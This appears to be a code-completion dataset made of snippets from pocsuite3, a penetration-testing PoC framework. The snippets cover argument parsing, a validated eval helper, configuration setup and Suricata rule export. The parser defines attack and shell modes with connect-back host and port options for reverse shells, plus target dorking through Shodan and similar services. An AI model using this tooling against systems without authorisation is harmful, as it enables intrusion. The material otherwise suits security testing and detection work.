"docker-start",
"docker-port",
"docker-env",
"docker-volume",
"docker-only",
# other
"poc",
"verbose",
"mode",
"api",
"connect_back_host",
"connect_back_port",
"session-reuse",
"session-reuse-num",
# web hook
"dingtalk-token",
"dingtalk-secret",
"wx-work-key"
]
The provided code snippet includes the necessary dependencies for implementing the `cmd_line_parser` function. Write a Python function `def cmd_line_parser(argv=None)` to solve the following problem:
This function parses the command line parameters and arguments.
Here is the function:
def cmd_line_parser(argv=None):
    """
    This function parses the command line parameters and arguments.

    :param argv: argument vector scanned for unknown "--" options that are
                 registered dynamically as PoC (DIY) options; defaults to
                 sys.argv. Note parse_args() itself still reads sys.argv.
    :return: the parsed argparse namespace
    """
    if not argv:
        argv = sys.argv

    _ = os.path.basename(argv[0])
    usage = "pocsuite [options]"
    parser = argparse.ArgumentParser(prog='Pocsuite3', usage=usage)
    try:
        parser.add_argument("--version", dest="show_version", action="store_true",
                            help="Show program's version number and exit")
        parser.add_argument("--update", dest="update_all", action="store_true",
                            help="Update Pocsuite3")
        parser.add_argument("-n", "--new", dest="new", action="store_true", help="Create a PoC template")
        parser.add_argument("-v", dest="verbose", type=int, default=1, choices=list(range(7)),
                            help="Verbosity level: 0-6 (default 1)")
        # Target options
        target = parser.add_argument_group('Target', "At least one of these "
                                                     "options has to be provided to define the target(s)")
        target.add_argument("-u", "--url", dest="url", nargs='+',
                            help="Target URL/CIDR (e.g. \"http://www.site.com/vuln.php?id=1\")")
        target.add_argument("-f", "--file", dest="url_file",
                            help="Scan multiple targets given in a textual file (one per line)")
        target.add_argument("-p", "--ports", dest="ports",
                            help="add additional port to each target ([proto:]port, e.g. 8080,https:10000)")
        target.add_argument("-s", dest="skip_target_port", action="store_true",
                            help="Skip target's port, only use additional port")
        target.add_argument("-r", dest="poc", nargs='+', help="Load PoC file from local or remote from seebug website")
        target.add_argument("-k", dest="poc_keyword", help="Filter PoC by keyword, e.g. ecshop")
        target.add_argument("-c", dest="configFile", help="Load options from a configuration INI file")
        target.add_argument("-l", dest="poc_list", action="store_true", help="Show all PoC file from local")
        # Mode options
        mode = parser.add_argument_group("Mode", "Pocsuite running mode options")
        mode.add_argument("--verify", dest="mode", default='verify', action="store_const", const='verify',
                          help="Run poc with verify mode")
        mode.add_argument("--attack", dest="mode", action="store_const", const='attack',
                          help="Run poc with attack mode")
        mode.add_argument("--shell", dest="mode", action="store_const", const='shell',
                          help="Run poc with shell mode")
        # Requests options
        request = parser.add_argument_group("Request", "Network request options")
        request.add_argument("--cookie", dest="cookie", help="HTTP Cookie header value")
        request.add_argument("--host", dest="host", help="HTTP Host header value")
        request.add_argument("--referer", dest="referer", help="HTTP Referer header value")
        request.add_argument("--user-agent", dest="agent", help="HTTP User-Agent header value (default random)")
        request.add_argument("--proxy", dest="proxy",
                             help="Use a proxy to connect to the target URL (protocol://host:port)")
        request.add_argument("--proxy-cred", dest="proxy_cred", help="Proxy authentication credentials (name:password)")
        request.add_argument("--timeout", dest="timeout", type=float, default=10,
                             help="Seconds to wait before timeout connection (default 10)")
        request.add_argument("--retry", dest="retry", type=int, default=0, help="Time out retrials times (default 0)")
        request.add_argument("--delay", dest="delay", help="Delay between two request of one thread")
        request.add_argument("--headers", dest="headers", help="Extra headers (e.g. \"key1: value1\\nkey2: value2\")")
        request.add_argument("--http-debug", dest="http_debug", type=int, default=0, help="HTTP debug level (default 0)")
        request.add_argument("--session-reuse", dest="requests_session_reuse", action="store_true",
                             help="Enable requests session reuse")
        request.add_argument("--session-reuse-num", type=int, dest="requests_session_reuse_num", default=10,
                             help="Requests session reuse number")
        # Account options
        group = parser.add_argument_group("Account", "Account options")
        group.add_argument("--ceye-token", dest="ceye_token", help="CEye token")
        group.add_argument("--oob-server", dest="oob_server",
                           help="Interactsh server to use (default \"interact.sh\")")
        group.add_argument("--oob-token", dest="oob_token",
                           help="Authentication token to connect protected interactsh server")
        group.add_argument("--seebug-token", dest="seebug_token", help="Seebug token")
        group.add_argument("--zoomeye-token", dest="zoomeye_token", help="ZoomEye token")
        group.add_argument("--shodan-token", dest="shodan_token", help="Shodan token")
        group.add_argument("--fofa-user", dest="fofa_user", help="Fofa user")
        group.add_argument("--fofa-token", dest="fofa_token", help="Fofa token")
        group.add_argument("--quake-token", dest="quake_token", help="Quake token")
        group.add_argument("--hunter-token", dest="hunter_token", help="Hunter token")
        group.add_argument("--censys-uid", dest="censys_uid", help="Censys uid")
        group.add_argument("--censys-secret", dest="censys_secret", help="Censys secret")
        # Modules options
        modules = parser.add_argument_group(
            "Modules", "Modules options")
        modules.add_argument("--dork", dest="dork", action="store", default=None,
                             help="Zoomeye dork used for search")
        modules.add_argument("--dork-zoomeye", dest="dork_zoomeye", action="store", default=None,
                             help="Zoomeye dork used for search")
        modules.add_argument("--dork-shodan", dest="dork_shodan", action="store", default=None,
                             help="Shodan dork used for search")
        modules.add_argument("--dork-fofa", dest="dork_fofa", action="store", default=None,
                             help="Fofa dork used for search")
        modules.add_argument("--dork-quake", dest="dork_quake", action="store", default=None,
                             help="Quake dork used for search")
        modules.add_argument("--dork-hunter", dest="dork_hunter", action="store", default=None,
                             help="Hunter dork used for search")
        modules.add_argument("--dork-censys", dest="dork_censys", action="store", default=None,
                             help="Censys dork used for search")
        modules.add_argument("--max-page", dest="max_page", type=int, default=1,
                             help="Max page used in search API")
        modules.add_argument("--search-type", dest="search_type", action="store", default='host',
                             help="search type used in search API, web or host")
        modules.add_argument("--vul-keyword", dest="vul_keyword", action="store", default=None,
                             help="Seebug keyword used for search")
        modules.add_argument("--ssv-id", dest="ssvid", action="store", default=None,
                             help="Seebug SSVID number for target PoC")
        modules.add_argument("--lhost", dest="connect_back_host", action="store", default=None,
                             help="Connect back host for target PoC in shell mode")
        modules.add_argument("--lport", dest="connect_back_port", action="store", default=None,
                             help="Connect back port for target PoC in shell mode")
        modules.add_argument("--tls", dest="enable_tls_listener", action="store_true", default=False,
                             help="Enable TLS listener in shell mode")
        modules.add_argument("--comparison", dest="comparison", help="Compare popular web search engines",
                             action="store_true",
                             default=False)
        modules.add_argument("--dork-b64", dest="dork_b64", help="Whether dork is in base64 format",
                             action="store_true",
                             default=False)
        # Optimization options
        optimization = parser.add_argument_group("Optimization", "Optimization options")
        optimization.add_argument("-o", "--output", dest="output_path", help="Output file to write (JSON Lines format)")
        optimization.add_argument("--plugins", dest="plugins", action="store", default=None,
                                  help="Load plugins to execute")
        optimization.add_argument("--pocs-path", dest="pocs_path", action="store", default=None,
                                  help="User defined poc scripts path")
        optimization.add_argument("--threads", dest="threads", type=int, default=150,
                                  help="Max number of concurrent network requests (default 150)")
        # typo fixes below: "defaut" -> "default", "reqeust" -> "request",
        # "Hiden" -> "Hide" (user-visible help text)
        optimization.add_argument("--batch", dest="batch",
                                  help="Automatically choose default choice without asking")
        optimization.add_argument("--requires", dest="check_requires", action="store_true", default=False,
                                  help="Check install_requires")
        optimization.add_argument("--quiet", dest="quiet", action="store_true", default=False,
                                  help="Activate quiet mode, working without logger")
        optimization.add_argument("--ppt", dest="ppt", action="store_true", default=False,
                                  help="Hide sensitive information when published to the network")
        optimization.add_argument("--pcap", dest="pcap", action="store_true", default=False,
                                  help="use scapy capture flow")
        optimization.add_argument("--rule", dest="rule", action="store_true", default=False,
                                  help="export suricata rules, default export request and response")
        optimization.add_argument("--rule-req", dest="rule_req", action="store_true", default=False,
                                  help="only export request rule")
        optimization.add_argument("--rule-filename", dest="rule_filename", action="store", default=False,
                                  help="Specify the name of the export rule file")
        optimization.add_argument("--no-check", dest="no_check", action="store_true", default=False,
                                  help="Disable URL protocol correction and honeypot check")
        # docker options
        docker_environment = parser.add_argument_group("Docker Environment", "Docker Environment options")
        docker_environment.add_argument("--docker-start", dest="docker_start", action="store_true",
                                        default=False, help="Run the docker for PoC")
        docker_environment.add_argument("--docker-port", dest="docker_port", action="append",
                                        default=[], help="Publish a container's port(s) to the host")
        docker_environment.add_argument("--docker-volume", dest="docker_volume", action="append",
                                        default=[], help="Bind mount a volume")
        docker_environment.add_argument("--docker-env", dest="docker_env", action="append", default=[],
                                        help="Set environment variables")
        docker_environment.add_argument("--docker-only", dest="docker_only", action="store_true",
                                        default=False, help="Only run docker environment")
        # web hook options
        web_hook = parser.add_argument_group('Web Hook', "Web Hook Options")
        web_hook.add_argument("--dingtalk-token", dest="dingtalk_token", help="Dingtalk access token")
        web_hook.add_argument("--dingtalk-secret", dest="dingtalk_secret", help="Dingtalk secret")
        web_hook.add_argument("--wx-work-key", dest="wx_work_key", help="Weixin Work key")
        # Diy options
        diy = parser.add_argument_group("Poc options", "definition options for PoC")
        diy.add_argument("--options", dest="show_options", action="store_true", default=False,
                         help="Show all definition options")

        # Register any unknown "--" option as a dynamic PoC option.
        # BUG FIX: strip a "=value" suffix so the "--opt=value" form works,
        # and skip duplicates so argparse does not raise a conflict error.
        seen = set()
        for line in argv:
            if line.startswith("--"):
                opt = line.split('=', 1)[0]
                if opt[2:] not in CMD_PARSE_WHITELIST and opt not in seen:
                    seen.add(opt)
                    diy.add_argument(opt)
        args = parser.parse_args()
        return args
    except SystemExit:
        # Protection against Windows dummy double clicking
        if IS_WIN:
            data_to_stdout("\nPress Enter to continue...")
            input()
        raise
161,774 | import re
from ast import (
Module,
parse,
walk,
)
from pocsuite3.lib.core.log import LOGGER as logger
def _check_expression(text, allowed_variables=None):
    """
    Return True when *text* is a single, safe Python expression.

    Safe means: it parses, the module body is exactly one expression
    statement, every AST node type is on the allow-list, and names, calls
    and attribute accesses pass their dedicated checks.

    >>> _check_expression("'x' in [1,2,3]", ["c1"])
    True
    >>> _check_expression("eval('1+1')", ["c1"])
    False
    >>> _check_expression("import sys", ["c1"])
    False
    >>> _check_expression("c3=='chr1' and c5>5", ["c3", "c5"])
    True
    """
    if allowed_variables is None:
        allowed_variables = []
    try:
        module = parse(text)
    except SyntaxError:
        return False
    if not isinstance(module, Module):
        return False
    body = module.body
    if len(body) != 1:
        return False
    statement = body[0]
    if statement.__class__.__name__ != "Expr":
        return False
    # Extra per-node-type validators on top of the type allow-list.
    extra_checks = {
        "Name": lambda node: _check_name(node, allowed_variables),
        "Call": lambda node: _check_call(node, allowed_variables),
        "Attribute": _check_attribute,
    }
    for node in walk(statement):
        node_class = node.__class__.__name__
        # Toss out everything that is not a "simple" expression:
        # imports, error handling, etc.
        if node_class not in AST_NODE_TYPE_ALLOWLIST:
            return False
        check = extra_checks.get(node_class)
        if check is not None and not check(node):
            return False
    return True
def convert_logical_operators(expression: str) -> str:
    """
    Translate C-style logical operators into Python equivalents:
    ``&&`` -> ``and``, ``||`` -> ``or``, and ``!func(`` -> ``not func(``
    for the known boolean helper functions.

    TODO, needs to be optimized in the future
    https://www.dabeaz.com/ply/ply.html#ply_nn26
    """
    bool_funcs = (
        'compare_versions', 'contains', 'contains_all', 'contains_any', 'regex',
        'starts_with', 'line_starts_with', 'ends_with', 'line_ends_with'
    )
    expression = re.sub(r'\s+&&\s+', ' and ', expression)
    expression = re.sub(r'\s+\|\|\s+', ' or ', expression)
    for name in bool_funcs:
        expression = re.sub(r'!\s*%s\(' % name, 'not %s(' % name, expression)
    return expression
The provided code snippet includes necessary dependencies for implementing the `safe_eval` function. Write a Python function `def safe_eval(expression, variables)` to solve the following problem:
>>> safe_eval("moo", {"moo": 5})
5
>>> exception_thrown = False
>>> try: safe_eval("moo", {"cow": 5})
... except Exception as e: exception_thrown = True
>>> exception_thrown
True
Here is the function:
def safe_eval(expression, variables):
    """
    Evaluate *expression* after validating it against an allow-list of
    AST nodes and the names in *variables*. If the raw expression fails
    validation, C-style logical operators are converted and it is checked
    once more before giving up.

    >>> safe_eval("moo", {"moo": 5})
    5
    >>> exception_thrown = False
    >>> try: safe_eval("moo", {"cow": 5})
    ... except Exception as e: exception_thrown = True
    >>> exception_thrown
    True
    """
    allowed_names = list(variables.keys())
    if not _check_expression(expression, allowed_variables=allowed_names):
        converted = convert_logical_operators(expression)
        if expression != converted:
            logger.debug(f'[+] Expressions convert: {expression} -> {converted}')
        expression = converted
        if not _check_expression(expression, allowed_variables=allowed_names):
            raise Exception(
                f"Invalid expression {expression}, possibly due to unsupported functions in the template or "
                "unresolved variables. If you suspect this is a Pocsuite3 issue, please submit an issue on GitHub.")
    return eval(expression, globals(), variables)
161,775 | import copy
import glob
import logging
import os
import re
import socket
import importlib
from queue import Queue
from urllib.parse import urlsplit
from http.client import HTTPConnection
import docker.errors
import requests
from requests_toolbelt.adapters.socket_options import TCPKeepAliveAdapter
import socks
import prettytable
from termcolor import colored
from pocsuite3.lib.core.clear import remove_extra_log_message
from pocsuite3.lib.core.common import boldify_message, check_file, get_file_items, parse_target, \
get_public_type_members, data_to_stdout
from pocsuite3.lib.core.common import check_path, extract_cookies
from pocsuite3.lib.core.common import get_local_ip, mosaic, get_host_ip
from pocsuite3.lib.core.common import single_time_warn_message
from pocsuite3.lib.core.common import OrderedSet, get_file_text, get_poc_name
from pocsuite3.lib.core.common import index_modules, ltrim
from pocsuite3.lib.core.common import parse_poc_docker_name
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf, cmd_line_options
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import merged_options
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.enums import HTTP_HEADER, CUSTOM_LOGGING, PROXY_TYPE
from pocsuite3.lib.core.exception import PocsuiteSyntaxException, PocsuiteSystemException, PocsuiteHeaderTypeException
from pocsuite3.lib.core.log import FORMATTER
from pocsuite3.lib.core.register import load_file_to_module
from pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT, CMD_PARSE_WHITELIST
from pocsuite3.lib.core.docker_env import DockerEnv
from pocsuite3.lib.core.statistics_comparison import StatisticsComparison
from pocsuite3.lib.core.update import update
from pocsuite3.lib.core.template import create_poc_plugin_template
from pocsuite3.lib.parse.cmd import DIY_OPTIONS
from pocsuite3.lib.parse.configfile import config_file_parser
from pocsuite3.lib.parse.rules import regex_rule
from pocsuite3.lib.parse.dockerfile import parse_dockerfile
from pocsuite3.lib.request.patch import patch_all
from pocsuite3.lib.request.patch.session_reuse import api_request
from pocsuite3.modules.listener import start_listener
def single_time_warn_message(message):
    """Log *message* at WARN level, deduplicated so it is emitted only once."""
    single_time_log_message(message, logging.WARN)
def stdout_encode(data):
    """
    Encode *data* for safe writing to the console stream.

    On Windows, characters the console cannot represent are replaced with
    '?' and a one-time warning is shown (see http://bugs.python.org/issue1602).
    Any encoding failure falls back to UNICODE_ENCODING.
    """
    ret = None
    try:
        data = data or ""

        # Reference: http://bugs.python.org/issue1602
        if IS_WIN:
            output = data.encode(sys.stdout.encoding, "replace")

            # BUG FIX: ``output`` is bytes, so the probe must be a bytes
            # literal. The original ``'?' in output`` always raised
            # TypeError, which the broad except below swallowed, so the
            # warning was never shown.
            if b'?' in output and '?' not in data:
                warn_msg = "cannot properly display Unicode characters "
                warn_msg += "inside Windows OS command prompt "
                warn_msg += "(http://bugs.python.org/issue1602). All "
                warn_msg += "unhandled occurrences will result in "
                warn_msg += "replacement with '?' character. Please, find "
                warn_msg += "proper character representation inside "
                warn_msg += "corresponding output files. "
                single_time_warn_message(warn_msg)

            ret = output
        else:
            ret = data.encode(sys.stdout.encoding)
    except Exception:
        # Fall back to the framework-wide default encoding on any failure
        # (e.g. sys.stdout.encoding is None when output is piped).
        ret = data.encode(UNICODE_ENCODING) if isinstance(data, str) else data

    return ret
def _resolve_cross_references():
    """Patch late-bound references into already-imported pocsuite3 submodules
    to break circular-import dependencies between convert/revision helpers."""
    # Local import avoids importing the package at module load time.
    import pocsuite3
    pocsuite3.lib.core.revision.stdout_encode = stdout_encode
    pocsuite3.lib.core.convert.single_time_warn_message = single_time_warn_message
161,776 | import copy
import glob
import logging
import os
import re
import socket
import importlib
from queue import Queue
from urllib.parse import urlsplit
from http.client import HTTPConnection
import docker.errors
import requests
from requests_toolbelt.adapters.socket_options import TCPKeepAliveAdapter
import socks
import prettytable
from termcolor import colored
from pocsuite3.lib.core.clear import remove_extra_log_message
from pocsuite3.lib.core.common import boldify_message, check_file, get_file_items, parse_target, \
get_public_type_members, data_to_stdout
from pocsuite3.lib.core.common import check_path, extract_cookies
from pocsuite3.lib.core.common import get_local_ip, mosaic, get_host_ip
from pocsuite3.lib.core.common import single_time_warn_message
from pocsuite3.lib.core.common import OrderedSet, get_file_text, get_poc_name
from pocsuite3.lib.core.common import index_modules, ltrim
from pocsuite3.lib.core.common import parse_poc_docker_name
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf, cmd_line_options
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import merged_options
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.enums import HTTP_HEADER, CUSTOM_LOGGING, PROXY_TYPE
from pocsuite3.lib.core.exception import PocsuiteSyntaxException, PocsuiteSystemException, PocsuiteHeaderTypeException
from pocsuite3.lib.core.log import FORMATTER
from pocsuite3.lib.core.register import load_file_to_module
from pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT, CMD_PARSE_WHITELIST
from pocsuite3.lib.core.docker_env import DockerEnv
from pocsuite3.lib.core.statistics_comparison import StatisticsComparison
from pocsuite3.lib.core.update import update
from pocsuite3.lib.core.template import create_poc_plugin_template
from pocsuite3.lib.parse.cmd import DIY_OPTIONS
from pocsuite3.lib.parse.configfile import config_file_parser
from pocsuite3.lib.parse.rules import regex_rule
from pocsuite3.lib.parse.dockerfile import parse_dockerfile
from pocsuite3.lib.request.patch import patch_all
from pocsuite3.lib.request.patch.session_reuse import api_request
from pocsuite3.modules.listener import start_listener
def _set_conf_attributes():
    """
    This function set some needed attributes into the configuration
    singleton.

    Every framework option gets an explicit default here; command line and
    config-file values are layered on top later by _merge_options().
    """
    debug_msg = "initializing the configuration"
    logger.debug(debug_msg)

    # target selection
    conf.url = None
    conf.url_file = None
    conf.ports = []
    conf.skip_target_port = False
    conf.mode = 'verify'
    conf.poc = None
    conf.poc_keyword = None
    conf.poc_list = None
    # HTTP request options
    conf.cookie = None
    conf.host = None
    conf.referer = None
    conf.agent = None
    conf.headers = None
    conf.proxy = None
    conf.proxy_cred = None
    conf.proxies = {}
    conf.timeout = 10
    conf.retry = 0
    conf.delay = 0
    conf.http_headers = {}
    conf.http_debug = 0
    # third-party service credentials
    conf.ceye_token = None
    conf.oob_server = None
    conf.oob_token = None
    conf.seebug_token = None
    conf.zoomeye_token = None
    conf.shodan_token = None
    conf.fofa_user = None
    conf.fofa_token = None
    conf.quake_token = None
    conf.hunter_token = None
    conf.censys_uid = None
    conf.censys_secret = None
    # search-engine dorks
    conf.dork = None
    conf.dork_zoomeye = None
    conf.dork_shodan = None
    conf.dork_fofa = None
    conf.dork_quake = None
    conf.dork_hunter = None
    conf.dork_censys = None
    conf.dork_b64 = False
    conf.max_page = 1
    conf.search_type = 'host'
    conf.comparison = False
    conf.vul_keyword = None
    conf.ssvid = None
    # runtime behaviour
    conf.plugins = []
    conf.threads = 150
    conf.batch = False
    conf.check_requires = False
    conf.quiet = False
    conf.update_all = False
    conf.new = False
    conf.verbose = 1
    conf.ipv6 = False
    conf.multiple_targets = False
    conf.pocs_path = None
    conf.output_path = None
    conf.plugin_name = None
    conf.plugin_code = None
    conf.connect_back_host = None
    conf.connect_back_port = DEFAULT_LISTENER_PORT
    conf.console_mode = False
    conf.show_version = False
    conf.api = False  # api for zipoc
    conf.ppt = False
    conf.pcap = False
    conf.rule = False
    conf.rule_req = False
    conf.rule_filename = None
    conf.no_check = False
    conf.show_options = False
    conf.enable_tls_listener = False
    # docker args
    conf.docker_start = False
    conf.docker_port = list()
    conf.docker_env = list()
    conf.docker_volume = list()
    conf.docker_only = False
    conf.requests_session_reuse = False
    # web hook
    conf.dingtalk_token = ""
    conf.dingtalk_secret = ""
    conf.wx_work_key = ""
def _set_kb_attributes(flush_all=True):
    """
    This function set some needed attributes into the knowledge base
    singleton.

    NOTE(review): ``flush_all`` is currently unused — the knowledge base is
    always fully reinitialized; confirm whether partial flushes were intended.
    """
    debug_msg = "initializing the knowledge base"
    logger.debug(debug_msg)

    kb.abs_file_paths = set()
    # fingerprinting results for the current target
    kb.os = None
    kb.os_version = None
    kb.arch = None
    kb.dbms = None
    kb.auth_header = None
    kb.counters = {}
    # threading state shared by the worker pool
    kb.multi_thread_mode = False
    kb.thread_continue = True
    kb.thread_exception = False
    kb.word_lists = None
    kb.single_log_flags = set()
    # per-run caches
    kb.cache = AttribDict()
    kb.cache.addrinfo = {}
    kb.cache.content = {}
    kb.cache.regex = {}
    # reverse-connection bookkeeping for shell mode
    kb.data = AttribDict()
    kb.data.local_ips = []
    kb.data.connect_back_ip = None
    kb.data.connect_back_port = DEFAULT_LISTENER_PORT
    kb.data.clients = []
    kb.targets = OrderedSet()
    # registered plugin instances, grouped by category
    kb.plugins = AttribDict()
    kb.plugins.targets = AttribDict()
    kb.plugins.pocs = AttribDict()
    kb.plugins.results = AttribDict()
    kb.results = []
    kb.current_poc = None
    kb.registered_pocs = AttribDict()
    kb.task_queue = Queue()
    kb.session_queue = Queue()
    kb.cmd_line = DIY_OPTIONS or []
    kb.comparison = None
def _merge_options(input_options, override_options):
    """
    Merge command line options with configuration file and default options.
    """
    # Accept both dict-like objects and argparse namespaces.
    if hasattr(input_options, "items"):
        input_options_items = input_options.items()
    else:
        input_options_items = input_options.__dict__.items()

    for key, value in input_options_items:
        # A value wins over the conf default when the key is new, the value
        # is "set", or override_options forces it. Caveat: 0 and 0.0 compare
        # equal to False, so ``value not in (None, False)`` treats them as
        # unset here.
        if key not in conf or value not in (None, False) or override_options:
            conf[key] = value

    # NOTE(review): .get assumes a dict-like input — an argparse namespace
    # would raise AttributeError here; confirm callers always pass a dict.
    if input_options.get("configFile"):
        config_file_parser(input_options["configFile"])
    merged_options.update(conf)
def _set_poc_options(input_options):
    """Record every non-framework option key as a PoC-specific (DIY) option."""
    DIY_OPTIONS.extend(
        key for key in input_options.keys() if key not in CMD_PARSE_WHITELIST
    )
def check_path(path):
    """Return True only when *path* is non-empty and exists on disk."""
    return bool(path) and os.path.exists(path)
# Framework-wide singletons, populated at runtime.
logger = LOGGER  # shared logger instance
conf = AttribDict()  # merged runtime configuration
cmd_line_options = AttribDict()  # raw command line options as parsed
paths = AttribDict()  # important framework filesystem paths
class AttribDict(OrderedDict):
    """
    An OrderedDict whose items can also be accessed as attributes.

    Dunder names, OrderedDict internals and anything listed in
    ``__exclude_keys__`` keep normal attribute semantics instead of
    being stored as dictionary items.
    """
    __exclude_keys__ = set()

    def _is_reserved(self, name):
        # Names that must bypass the dict-backed attribute protocol.
        return (name.startswith('__')
                or name.startswith('_OrderedDict__')
                or name in self.__exclude_keys__)

    def __getattr__(self, name):
        if self._is_reserved(name):
            return super(AttribDict, self).__getattribute__(name)
        try:
            return self[name]
        except KeyError:
            # Preserve attribute-access semantics for missing keys.
            raise AttributeError(name)

    def __setattr__(self, name, value):
        if self._is_reserved(name):
            return super(AttribDict, self).__setattr__(name, value)
        self[name] = value

    def __delattr__(self, name):
        if self._is_reserved(name):
            return super(AttribDict, self).__delattr__(name)
        del self[name]
def update():
    """Check PyPI for a newer pocsuite3 release (only when --update was
    given) and print upgrade instructions if one exists."""
    if not conf.update_all:
        return
    logger.info('Checking the latest version number of pocsuite3 on pypi')
    # XML-RPC query against PyPI for all published release numbers.
    client = ServerProxy('https://pypi.python.org/pypi')
    versions = client.package_releases('pocsuite3', True)
    upstream_version = max(map(parse_version, versions))
    current_version = parse_version(__version__)
    logger.info(f'Current upstream version: {upstream_version}')
    if current_version < upstream_version:
        # NOTE(review): the banner below is user-visible output; "Installtion"
        # is a typo in the released string — fix it upstream, not in docs.
        logger.info(''
                    '----[ 1.1 - Installtion & Upgrade Methods\n'
                    '\n'
                    'Python pip\n'
                    '\n'
                    ' $ pip3 install -U pocsuite3\n'
                    '\n'
                    ' $ use other pypi mirror\n'
                    ' $ pip3 install -U -i https://pypi.tuna.tsinghua.edu.cn/simple pocsuite3\n'
                    '\n'
                    'MacOS\n'
                    '\n'
                    ' $ brew install pocsuite3\n'
                    '\n'
                    'Kali, Ubuntu 22.04, Debian\n'
                    '\n'
                    ' $ sudo apt-get install pocsuite3\n'
                    '\n'
                    'Docker\n'
                    '\n'
                    ' $ docker run -it pocsuite3/pocsuite3\n'
                    '\n'
                    'ArchLinux\n'
                    '\n'
                    ' $ yay pocsuite3\n'
                    '\n'
                    'Install from source code\n'
                    '\n'
                    ' $ wget https://github.com/knownsec/pocsuite3/archive/master.zip\n'
                    ' $ unzip master.zip\n'
                    ' $ cd pocsuite3-master\n'
                    ' $ pip3 install -r requirements.txt\n'
                    ' $ python3 setup.py install\n'
                    )
def regex_rule(files):
    """
    Extract metadata (name, suricata request/response snippets, dates, ids)
    from each PoC source file in *files* and append generated suricata rules
    to conf.rule_filename.
    """
    if not conf.rule_filename:
        conf.rule_filename = "rule.rule"
    for file_name in files:
        # Regexes pulling each metadata field out of the PoC source text;
        # indexed via the string values of information_list below.
        regx_rules = ["name = '(.*)'",
                      r"suricata_request = '''([\s\S]*?)'''",
                      r"references = \['(.*)'\]", "createDate = '(.*)'", "updateDate = '(.*)'",
                      "vulID = '(.*)'",
                      "version = '(.*)'",
                      r"suricata_response = '''([\s\S]*?)'''",
                      ]
        # Values start as indices into regx_rules and are replaced in place
        # with the extracted text ("flowbits" has no regex and stays empty).
        information_list = {"name": "0",
                            "suricata_request": "1",
                            "references": "2",
                            "createDate": "3",
                            "updateDate": "4",
                            "vulID": "5",
                            "version": "6",
                            "suricata_response": "7",
                            "flowbits": ""}
        st = get_file_text(file_name)
        for key, value in information_list.items():
            if value:
                pattern = re.compile(regx_rules[int(value)])
                cve_list = pattern.findall(st)
                if cve_list:
                    if "name" in regx_rules[int(value)]:
                        information_list[key] = cve_list[0].replace("\n", "")
                    else:
                        # Suricata snippets keep their spaces; scalar fields
                        # are normalized by stripping whitespace.
                        if "suricata_request" not in regx_rules[int(value)] and "suricata_response" not in regx_rules[int(value)]:
                            information_list[key] = cve_list[0].replace("\n", "").replace(" ", "")
                        else:
                            information_list[key] = cve_list[0].replace("\n", "")
                else:
                    information_list[key] = ""
        # PoCs without a suricata_request snippet cannot produce a rule.
        if not information_list["suricata_request"]:
            continue
        if "、" in information_list["vulID"]:
            information_list["vulID"] = information_list["vulID"].split("、")[0]
        elif not information_list["vulID"]:
            information_list["vulID"] = 0
        # SIDs are derived from a fixed base plus 2*vulID (request rule) and
        # 2*vulID+1 (response rule), paired via a flowbit.
        if information_list["suricata_response"] and not conf.rule_req:
            # 6220553==seebug.( ˇωˇ)
            rule_to_server = '''alert http any any -> any any (msg:"{}";flow:established,to_server;{}classtype:web-application-attack;reference:url,{}; metadata:created_at {}, updated_at {};flowbits:set,{};flowbits:noalert;sid:{};rev:{};)'''.format(
                information_list["name"], information_list["suricata_request"], information_list["references"],
                information_list["createDate"], information_list["updateDate"], information_list["name"].replace(" ", "_"),
                6220553 + int(float(information_list["vulID"])) * 2, int(float(information_list["version"])))
            rule_to_client = '''alert http any any -> any any (msg:"{}";flow:established,to_client;{}classtype:web-application-attack;reference:url,{}; metadata:created_at {}, updated_at {};flowbits:isset,{};sid:{};rev:{};)'''.format(
                information_list["name"], information_list["suricata_response"], information_list["references"],
                information_list["createDate"], information_list["updateDate"], information_list["name"].replace(" ", "_"),
                6220553 + int(float(information_list["vulID"])) * 2 + 1, int(float(information_list["version"])))
        else:
            rule_to_server = '''alert http any any -> any any (msg:"{}";flow:established,to_server;{}classtype:web-application-attack;reference:url,{}; metadata:created_at {}, updated_at {};sid:{};rev:{};)'''.format(
                information_list["name"], information_list["suricata_request"], information_list["references"],
                information_list["createDate"], information_list["updateDate"],
                6220553 + int(float(information_list["vulID"])) * 2,
                int(float(information_list["version"])))
            rule_to_client = ""
        with open(conf.rule_filename, "a", encoding="utf-8") as f:
            f.write(rule_to_server+"\n")
            f.write(rule_to_client+"\n")
            # redundant inside the "with" block, but kept byte-identical
            f.close()
        logger.info("{} rule is:".format(file_name[file_name.rfind("\\")+1:]))
        print(rule_to_server)
        print(rule_to_client)
def init_options(input_options=None, override_options=False):
    """
    Initialize the conf/kb singletons and merge user supplied options.

    In rule-export mode (--rule / --rule-req) suricata rules are generated
    from the selected PoC files and the process exits without running PoCs.

    :param input_options: dict-like options to merge (default: empty)
    :param override_options: force input values over existing conf values
    """
    # Avoid the shared mutable default argument of the original signature.
    if input_options is None:
        input_options = AttribDict()
    cmd_line_options.update(input_options)
    _set_conf_attributes()
    _set_poc_options(input_options)
    _set_kb_attributes()
    _merge_options(input_options, override_options)
    # export rules, dont run the poc in the default status
    if conf.rule or conf.rule_req:
        logger.info("The rule export function is in use. The POC is not executed at this point")
        if conf.pocs_path and check_path(conf.pocs_path):
            paths.USER_POCS_PATH = conf.pocs_path
            for root, dirs, files in os.walk(paths.USER_POCS_PATH):
                files = [f for f in files if not f.startswith("__") and f.endswith(".py")]
                # BUG FIX: the original concatenated the base path and file
                # name without a separator and ignored sub-directories; join
                # against the walked root so every file path resolves.
                regex_rule([os.path.join(root, f) for f in files])
        if conf.poc:
            regex_rule(conf.poc)
        exit()
    # if check version
    if conf.show_version:
        exit()
161,777 | import os
from pocsuite3.lib.core.common import is_pocsuite3_poc, single_time_warn_message
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.register import load_string_to_module, load_file_to_module
# Knowledge-base singleton shared across the framework; populated at runtime.
kb = AttribDict()
def register_plugin(plugin_class):
